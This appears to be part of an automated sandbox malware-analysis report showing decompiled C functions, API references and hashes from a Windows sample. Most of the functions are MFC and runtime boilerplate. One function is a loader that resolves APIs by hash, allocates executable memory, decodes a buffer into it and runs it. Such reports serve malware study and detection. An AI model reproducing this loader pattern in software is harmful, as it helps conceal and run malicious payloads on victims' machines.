                  					 *((intOrPtr*)(_t15 + 0x5c)) = GetMenu( *(__ecx + 0x20));
                  					return 1;
                  				}
                  				return _t7;
                  			}











                  APIs
                    • Part of subcall function 0040ACDF: __EH_prolog3.LIBCMT ref: 0040ACE6
                  • GetMenu.USER32(?), ref: 0040453B
                  Similarity
                  • API ID: H_prolog3Menu
                  • String ID:
                  • API String ID: 3706238695-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0043ABB6(intOrPtr _a4) {
                  				void* _t6;
                  
                  				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                  				 *0x466eac = _t6;
                  				if(_t6 != 0) {
                  					 *0x468784 = 1;
                  					return 1;
                  				} else {
                  					return _t6;
                  				}
                  			}





                  APIs
                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0043ABCB
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00430AD2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t9;
                  				void* _t18;
                  
                  				_push(0xc);
                  				_push(0x45de98);
                  				E00431818(__ebx, __edi, __esi);
                  				E004339CB();
                  				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
                  				_t9 = E004309E7(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
                  				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
                  				 *(_t18 - 4) = 0xfffffffe;
                  				E00430B08();
                  				return E0043185D( *((intOrPtr*)(_t18 - 0x1c)));
                  			}






                  APIs
                    • Part of subcall function 004339CB: __lock.LIBCMT ref: 004339CD
                  • __onexit_nolock.LIBCMT ref: 00430AEA
                    • Part of subcall function 004309E7: __decode_pointer.LIBCMT ref: 004309F6
                    • Part of subcall function 004309E7: __decode_pointer.LIBCMT ref: 00430A06
                    • Part of subcall function 004309E7: __msize.LIBCMT ref: 00430A24
                    • Part of subcall function 004309E7: __realloc_crt.LIBCMT ref: 00430A48
                    • Part of subcall function 004309E7: __realloc_crt.LIBCMT ref: 00430A5E
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A70
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A7E
                    • Part of subcall function 004309E7: __encode_pointer.LIBCMT ref: 00430A89
                  Similarity
                  • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                  • String ID:
                  • API String ID: 1316407801-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00412C34(void* __ecx, int _a4) {
                  				int _t7;
                  
                  				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
                  					goto ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x50)))) + 0xa0)));
                  				}
                  				_t7 = ShowWindow( *(__ecx + 0x20), _a4); // executed
                  				return _t7;
                  			}





                  APIs
                  • ShowWindow.USER32(?,?,?,004050C1,00000001), ref: 00412C45
                  Similarity
                  • API ID: ShowWindow
                  • String ID:
                  • API String ID: 1268545403-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 69%
                  			E004085AB(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                  				char _v8;
                  				intOrPtr _v20;
                  				intOrPtr _t8;
                  				void* _t9;
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  
                  				_t21 = __esi;
                  				_t20 = __edi;
                  				_t18 = __ecx;
                  				_t17 = __ebx;
                  				_t8 =  *((intOrPtr*)(__ecx + 0xd4));
                  				if(_t8 != 1) {
                  					__eflags = _t8 - 2;
                  					if(__eflags == 0) {
                  						_push( *((intOrPtr*)(__ecx + 0xd8)));
                  						goto L8;
                  					} else {
                  						_push(__ecx);
                  						_v8 = 0x462598;
                  						E00430CF4( &_v8, 0x45b30c);
                  						asm("int3");
                  						_push(4);
                  						E00431A9B(E0044AC81, __ebx, __edi, __esi);
                  						_t19 = E00420529(0x104);
                  						_v20 = _t19;
                  						_t15 = 0;
                  						_v8 = 0;
                  						if(_t19 != 0) {
                  							_t15 = E0041EC43(_t19);
                  						}
                  						return E00431B73(_t15);
                  					}
                  				} else {
                  					_push(GetMenu( *(__ecx + 0x20)));
                  					L8:
                  					_t9 = E0041F4E8(_t17, _t18, _t20, _t21, __eflags); // executed
                  					return _t9;
                  				}
                  			}










                  APIs
                  Similarity
                  • API ID: Menu
                  • String ID:
                  • API String ID: 3711407533-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004044B6(void* __ecx, int _a4, int _a8, long _a12) {
                  				long _t6;
                  
                  				_t6 = DefFrameProcA( *(__ecx + 0x20),  *(__ecx + 0xe8), _a4, _a8, _a12); // executed
                  				return _t6;
                  			}





                  APIs
                  • DefFrameProcA.USER32(?,?,?,?,?), ref: 004044CD
                  Similarity
                  • API ID: FrameProc
                  • String ID:
                  • API String ID: 3341528880-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404644(void* __ecx, int _a4, int _a8, long _a12) {
                  				long _t5;
                  
                  				_t5 = DefMDIChildProcA( *(__ecx + 0x20), _a4, _a8, _a12); // executed
                  				return _t5;
                  			}





                  APIs
                  • DefMDIChildProcA.USER32(?,?,?,?), ref: 00404655
                  Similarity
                  • API ID: ChildProc
                  • String ID:
                  • API String ID: 2769581038-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00435EE6() {
                  				void* _t1;
                  
                  				_t1 = E00435E74(0); // executed
                  				return _t1;
                  			}





                  APIs
                  • __encode_pointer.LIBCMT ref: 00435EE8
                    • Part of subcall function 00435E74: TlsGetValue.KERNEL32(00000000,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435E86
                    • Part of subcall function 00435E74: TlsGetValue.KERNEL32(00000006,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435E9D
                    • Part of subcall function 00435E74: RtlEncodePointer.NTDLL(00000000,?,00435EED,00000000,00442436,00466EB0,00000000,00000314,?,0043AD55,00466EB0,Microsoft Visual C++ Runtime Library,00012010), ref: 00435EDB
                  Similarity
                  • API ID: Value$EncodePointer__encode_pointer
                  • String ID:
                  • API String ID: 2585649348-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E004037C0(intOrPtr __edx, void* __eflags) {
                  				intOrPtr _v36;
                  				struct HINSTANCE__* _v40;
                  				short _v56;
                  				char _v60;
                  				char _v64;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr* _t18;
                  				intOrPtr* _t20;
                  				intOrPtr* _t22;
                  				intOrPtr* _t24;
                  				void* _t26;
                  				long _t27;
                  				void* _t30;
                  				intOrPtr _t31;
                  				void* _t32;
                  				void* _t34;
                  				void* _t35;
                  				void* _t38;
                  				void* _t46;
                  				intOrPtr _t51;
                  				void* _t55;
                  				void* _t56;
                  				void* _t59;
                  				long _t60;
                  				void* _t63;
                  				void* _t73;
                  				void* _t76;
                  				void* _t80;
                  
                  				_t80 = __eflags;
                  				_t51 = __edx;
                  				E00403340(E00403130(0x4674a0, 0x44f0f5), _t80, 0xa);
                  				E00402F80(_t14);
                  				_t18 = E00403690(E004035A0(_t51, 0), 0x3e006b7a);
                  				_t20 = E00403690(E004035A0(_t51, 0), 0x92ffa82f);
                  				_t22 = E00403690(E004035A0(_t51, 0), 0xc319fa22);
                  				_t24 = E00403690(E004035A0(_t51, 0), 0x49b3b7c3);
                  				_t59 =  *_t18(0, 0x29a, 0xa);
                  				_t26 =  *_t20(0, _t59);
                  				_t27 =  *_t22(0, _t59);
                  				_t60 = _t27;
                  				_t46 =  *_t24(_t26);
                  				_t30 = E00402EF0( &_v64, 0x2b0, 0);
                  				_t73 = _t63 + 0x44;
                  				if( *((intOrPtr*)(_t30 + 0x18)) < 8) {
                  					_t31 = _t30 + 4;
                  					__eflags = _t31;
                  				} else {
                  					_t31 =  *((intOrPtr*)(_t30 + 4));
                  				}
                  				_push(_t31);
                  				_t32 = E00430D56();
                  				_t34 = E00403690(E004035A0(_t51, 0), _t32);
                  				_t76 = _t73 + 0x10;
                  				_t55 = _t34;
                  				_t82 = _v36 - 8;
                  				if(_v36 >= 8) {
                  					E00404490(_t46, _t55, _t60, _t82, _v56);
                  					_t76 = _t76 + 4;
                  				}
                  				_v36 = 7;
                  				_v40 = 0;
                  				_v56 = 0;
                  				_t35 = VirtualAlloc(0, _t60, 0x1000, 0x40); // executed
                  				_t56 = _t35;
                  				E004311E0(_t46, _t56, _t60, _t56, _t46, _t60);
                  				_t38 = E00402EF0( &_v60, 0x18d, 0);
                  				if( *((intOrPtr*)(_t38 + 0x18)) < 8) {
                  					_t39 = _t38 + 4;
                  					__eflags = _t38 + 4;
                  				} else {
                  					_t39 =  *((intOrPtr*)(_t38 + 4));
                  				}
                  				E00403700(_t39, _t56, _t60);
                  				_t84 = _v36 - 8;
                  				if(_v36 >= 8) {
                  					E00404490(_t46, _t56, _t60, _t84, _v56);
                  				}
                  				 *_t56();
                  				return 0;
                  			}



































                  APIs
                    • Part of subcall function 004035A0: __wcslwr.LIBCMT ref: 0040362D
                    • Part of subcall function 00402EF0: LoadStringW.USER32(?,00000000,?,00000000), ref: 00402F0C
                  • VirtualAlloc.KERNELBASE ref: 004038EB
                  Similarity
                  • API ID: AllocLoadStringVirtual__wcslwr
                  • String ID:
                  • API String ID: 3774548895-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 100%
                  			E00440CFD(signed int __eax, void* __esi) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v20;
                  				signed int _t142;
                  				signed int _t145;
                  				signed int _t148;
                  				signed int _t151;
                  				signed int _t154;
                  				signed int _t157;
                  				signed int _t159;
                  				signed int _t162;
                  				signed int _t165;
                  				signed int _t168;
                  				signed int _t171;
                  				signed int _t174;
                  				signed int _t177;
                  				signed int _t180;
                  				signed int _t183;
                  				signed int _t186;
                  				signed int _t189;
                  				signed int _t192;
                  				signed int _t195;
                  				signed int _t198;
                  				signed int _t201;
                  				signed int _t204;
                  				signed int _t207;
                  				signed int _t210;
                  				signed int _t213;
                  				signed int _t216;
                  				signed int _t219;
                  				signed int _t222;
                  				signed int _t225;
                  				signed int _t228;
                  				signed int _t231;
                  				signed int _t234;
                  				signed int _t237;
                  				signed int _t240;
                  				signed int _t243;
                  				signed int _t246;
                  				signed int _t249;
                  				signed int _t252;
                  				signed int _t255;
                  				signed int _t258;
                  				signed int _t261;
                  				signed int _t264;
                  				signed int _t267;
                  				signed int _t270;
                  				signed int _t276;
                  
                  				_t278 =  *(__eax + 0x42) & 0x0000ffff;
                  				_t279 =  *(__eax + 0x44) & 0x0000ffff;
                  				_v8 =  *(__eax + 0x42) & 0x0000ffff;
                  				_v12 =  *(__eax + 0x44) & 0x0000ffff;
                  				if(__esi != 0) {
                  					_v16 = _v16 & 0x00000000;
                  					_v20 = __eax;
                  					_t142 = E0043C0B5(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
                  					_t145 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
                  					_t148 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
                  					_t151 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
                  					_t154 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
                  					_t157 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
                  					_t159 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x37, __esi);
                  					_t162 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
                  					_t165 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
                  					_t168 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
                  					_t171 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
                  					_t174 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
                  					_t177 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
                  					_t180 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
                  					_t183 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
                  					_t186 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
                  					_t189 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
                  					_t192 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
                  					_t195 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
                  					_t198 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
                  					_t201 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
                  					_t204 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
                  					_t207 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
                  					_t210 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
                  					_t213 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
                  					_t216 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
                  					_t219 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
                  					_t222 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
                  					_t225 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
                  					_t228 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
                  					_t231 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
                  					_t234 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
                  					_t237 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
                  					_t240 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
                  					_t243 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
                  					_t246 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
                  					_t249 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
                  					_t252 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
                  					_t255 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
                  					_t258 = E0043C0B5(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
                  					_t261 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
                  					_t264 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
                  					_t267 = E0043C0B5(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
                  					_t276 = _v12;
                  					_t270 = E0043C0B5(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
                  					 *(__esi + 0xac) = _t276;
                  					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
                  				} else {
                  					return __eax | 0xffffffff;
                  				}
                  			}


                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ___getlocaleinfo
                  • String ID:
                  • API String ID: 1937885557-0
                  • Opcode ID: 9053ce3c1f0c1ff8f56ed28a358241bbee1eb6b9847517bbb92b560b8be99c02
                  • Instruction ID: 59fd04f248aebe5f6f2e84f9c40bf99b053675ffa63a6a04f46dc497c744b53e
                  • Opcode Fuzzy Hash: 9053ce3c1f0c1ff8f56ed28a358241bbee1eb6b9847517bbb92b560b8be99c02
                  • Instruction Fuzzy Hash: 95E1D0B290024DFEEF12DAE1CD81DFF77BDEB08748F04055BB255E2041EA75AA059B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E0042EEC9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t114;
                  				signed int _t116;
                  				signed int _t118;
                  				intOrPtr _t122;
                  				long _t131;
                  				signed int _t138;
                  				signed int _t139;
                  				void* _t143;
                  				signed int _t147;
                  				signed int _t148;
                  				void* _t156;
                  				intOrPtr* _t163;
                  				signed int _t175;
                  				signed int _t176;
                  				signed int _t179;
                  				void* _t181;
                  				signed short _t190;
                  				intOrPtr _t192;
                  				void* _t200;
                  				void* _t204;
                  				void* _t205;
                  				void* _t207;
                  
                  				_t165 = __ecx;
                  				_push(0x7c);
                  				_t109 = E00431A9B(E0044CA27, __ebx, __edi, __esi);
                  				_t200 = __ecx;
                  				 *(_t204 - 0x10) = __ecx;
                  				_t163 =  *((intOrPtr*)(_t204 + 8));
                  				_t190 =  *(_t163 + 4);
                  				 *(_t204 - 0x1c) = _t190;
                  				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
                  					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
                  						L49:
                  						_t190 =  *(_t204 - 0x1c);
                  						goto L50;
                  					} else {
                  						_t109 = GetKeyState(4);
                  						_t217 = _t109;
                  						if(_t109 < 0) {
                  							goto L49;
                  						} else {
                  							_t114 = E0041F396(_t163, _t165, GetKeyState, _t200, _t217);
                  							_push( *_t163);
                  							_t192 = _t114;
                  							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
                  							while(1) {
                  								_t109 = E0040EE3C(_t163, _t165);
                  								if(_t109 == 0) {
                  									break;
                  								}
                  								__eflags =  *(_t109 + 0x3c) & 0x00000401;
                  								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                  									break;
                  								} else {
                  									_push(GetParent( *(_t109 + 0x20)));
                  									continue;
                  								}
                  							}
                  							if(_t109 == _t200) {
                  								_t164 =  *(_t192 + 0x3c);
                  								 *(_t204 - 0x14) = E0040F142(_t200);
                  								__eflags = _t164;
                  								if(__eflags == 0) {
                  									L19:
                  									_t116 = E00404461(__eflags, 0x70);
                  									 *(_t204 - 0x1c) = _t116;
                  									_t164 = 0;
                  									 *(_t204 - 4) = 0;
                  									__eflags = _t116;
                  									if(__eflags != 0) {
                  										_t164 = E0042EBE0(0, _t116, _t192, _t200, __eflags);
                  									}
                  									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
                  									_t118 =  *((intOrPtr*)( *_t164 + 0x13c))( *(_t204 - 0x14), 1);
                  									__eflags = _t118;
                  									if(_t118 != 0) {
                  										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
                  										_t200 =  *(_t204 - 0x10);
                  										 *(_t192 + 0x3c) = _t164;
                  										L24:
                  										E00431160(_t192, _t204 - 0x88, 0, 0x30);
                  										_t122 =  *((intOrPtr*)(_t204 + 8));
                  										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
                  										 *(_t204 - 0x28) =  *(_t122 + 0x14);
                  										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
                  										E00431160(_t192, _t204 - 0x58, 0, 0x30);
                  										_t207 = _t205 + 0x18;
                  										 *(_t204 - 0x58) = 0x2c;
                  										_t109 =  *((intOrPtr*)( *_t200 + 0x74))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
                  										asm("sbb ecx, ecx");
                  										_t175 =  ~(_t109 + 1) & _t200;
                  										 *(_t204 - 0x1c) = _t109;
                  										 *(_t204 - 0x14) = _t175;
                  										__eflags =  *(_t192 + 0x44) - _t109;
                  										if( *(_t192 + 0x44) != _t109) {
                  											L30:
                  											__eflags = _t109 - 0xffffffff;
                  											if(_t109 == 0xffffffff) {
                  												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
                  												L39:
                  												E0042EE49(_t164,  *((intOrPtr*)(_t204 + 8)));
                  												_t131 =  *(_t192 + 0x48);
                  												__eflags = _t131;
                  												if(_t131 != 0) {
                  													__eflags =  *_t131 - 0x2c;
                  													if( *_t131 >= 0x2c) {
                  														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
                  													}
                  												}
                  												 *(_t192 + 0x40) =  *(_t204 - 0x14);
                  												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
                  												__eflags =  *(_t192 + 0x48);
                  												if(__eflags == 0) {
                  													 *(_t192 + 0x48) = E00404461(__eflags, 0x30);
                  													E00431160(_t192, _t134, 0, 0x30);
                  													_t207 = _t207 + 0x10;
                  												}
                  												_t176 = 0xc;
                  												_t200 = _t204 - 0x58;
                  												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
                  												_t192 = _t200 + _t176 + _t176;
                  												L45:
                  												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
                  												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
                  													__eflags =  *(_t204 - 0x38);
                  													if(__eflags == 0) {
                  														_push( *((intOrPtr*)(_t204 - 0x34)));
                  														_t109 = E004316F6(_t164, _t192, _t200, __eflags);
                  													}
                  												}
                  												goto L77;
                  											}
                  											_t179 = 0xc;
                  											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
                  											_t207 = _t207 + 0xc;
                  											_t181 =  *(_t204 - 0x10);
                  											_t139 = _t138 & 0x3fffffff;
                  											 *(_t204 - 0x84) = _t139;
                  											__eflags =  *(_t181 + 0x3c) & 0x00000400;
                  											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
                  												_t148 = _t139 | 0x00000020;
                  												__eflags = _t148;
                  												 *(_t204 - 0x84) = _t148;
                  											}
                  											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
                  											__eflags =  *(_t204 - 0x54) & 0x40000000;
                  											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
                  												L35:
                  												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
                  												_t143 =  *(_t204 - 0x10);
                  												__eflags =  *(_t143 + 0x3c) & 0x00000400;
                  												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
                  													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
                  												}
                  												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
                  												goto L38;
                  											} else {
                  												_t147 = E004117D8( *(_t204 - 0x10));
                  												__eflags = _t147;
                  												if(_t147 == 0) {
                  													L38:
                  													_t192 =  *((intOrPtr*)(_t204 - 0x18));
                  													goto L39;
                  												}
                  												goto L35;
                  											}
                  										}
                  										__eflags =  *(_t192 + 0x40) - _t175;
                  										if( *(_t192 + 0x40) != _t175) {
                  											goto L30;
                  										}
                  										__eflags =  *(_t200 + 0x3c) & 0x00000400;
                  										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
                  											__eflags = _t109 - 0xffffffff;
                  											if(_t109 != 0xffffffff) {
                  												_t109 = E0042EE49(_t164,  *((intOrPtr*)(_t204 + 8)));
                  											}
                  										} else {
                  											GetCursorPos(_t204 - 0x20);
                  											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
                  										}
                  										goto L45;
                  									} else {
                  										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
                  										goto L77;
                  									}
                  								}
                  								_t156 = E00410293(_t164);
                  								__eflags = _t156 -  *(_t204 - 0x14);
                  								if(_t156 !=  *(_t204 - 0x14)) {
                  									 *((intOrPtr*)( *_t164 + 0x60))();
                  									 *((intOrPtr*)( *_t164 + 4))(1);
                  									_t164 = 0;
                  									__eflags = 0;
                  									 *(_t192 + 0x3c) = 0;
                  								}
                  								__eflags = _t164;
                  								if(__eflags != 0) {
                  									goto L24;
                  								} else {
                  									goto L19;
                  								}
                  							} else {
                  								if(_t109 == 0) {
                  									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
                  									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
                  								}
                  								goto L77;
                  							}
                  						}
                  					}
                  				} else {
                  					L50:
                  					__eflags =  *(_t200 + 0x3c) & 0x00000401;
                  					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
                  						L77:
                  						return E00431B73(_t109);
                  					}
                  					_push( *_t163);
                  					while(1) {
                  						_t109 = E0040EE3C(_t163, _t165);
                  						__eflags = _t109;
                  						if(_t109 == 0) {
                  							break;
                  						}
                  						__eflags = _t109 - _t200;
                  						if(_t109 == _t200) {
                  							L57:
                  							__eflags = _t190 - 0x100;
                  							if(_t190 < 0x100) {
                  								L59:
                  								__eflags = _t190 - 0x104 - 3;
                  								if(_t190 - 0x104 > 3) {
                  									_t109 = 0;
                  									__eflags = 0;
                  									L62:
                  									__eflags =  *(_t200 + 0x3c) & 0x00000400;
                  									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
                  										goto L77;
                  									}
                  									__eflags = _t109;
                  									if(__eflags != 0) {
                  										L76:
                  										_t109 = E0040D89A(_t165, __eflags, _t109);
                  										goto L77;
                  									}
                  									__eflags = _t190 - 0x201;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x203;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x204;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x206;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x207;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0x209;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa1;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa3;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa4;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa6;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa7;
                  									if(__eflags == 0) {
                  										goto L76;
                  									}
                  									__eflags = _t190 - 0xa9;
                  									if(__eflags != 0) {
                  										goto L77;
                  									}
                  									goto L76;
                  								}
                  								L60:
                  								_t109 = 1;
                  								goto L62;
                  							}
                  							__eflags = _t190 - 0x109;
                  							if(_t190 <= 0x109) {
                  								goto L60;
                  							}
                  							goto L59;
                  						}
                  						__eflags =  *(_t109 + 0x3c) & 0x00000401;
                  						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
                  							break;
                  						}
                  						_push(GetParent( *(_t109 + 0x20)));
                  					}
                  					__eflags = _t109 - _t200;
                  					if(_t109 != _t200) {
                  						goto L77;
                  					}
                  					goto L57;
                  				}
                  			}


                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042EED0
                  • GetKeyState.USER32(00000001), ref: 0042EF17
                  • GetKeyState.USER32(00000002), ref: 0042EF24
                  • GetKeyState.USER32(00000004), ref: 0042EF31
                  • GetParent.USER32(?), ref: 0042EF56
                  • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042F002
                  • _memset.LIBCMT ref: 0042F019
                  • ScreenToClient.USER32 ref: 0042F037
                  • _memset.LIBCMT ref: 0042F045
                  • GetCursorPos.USER32(?), ref: 0042F08B
                  • SendMessageA.USER32(?,00000412,00000000,?), ref: 0042F0A9
                  • SendMessageA.USER32(?,00000404,00000000,?), ref: 0042F118
                  • SendMessageA.USER32(?,00000401,00000001,00000000), ref: 0042F13E
                  • SendMessageA.USER32(?,00000411,00000001,?), ref: 0042F15D
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0042F170
                  • SendMessageA.USER32(?,00000405,00000000,?), ref: 0042F19A
                  • _memset.LIBCMT ref: 0042F1BF
                  • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042F200
                  • GetParent.USER32(?), ref: 0042F22F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
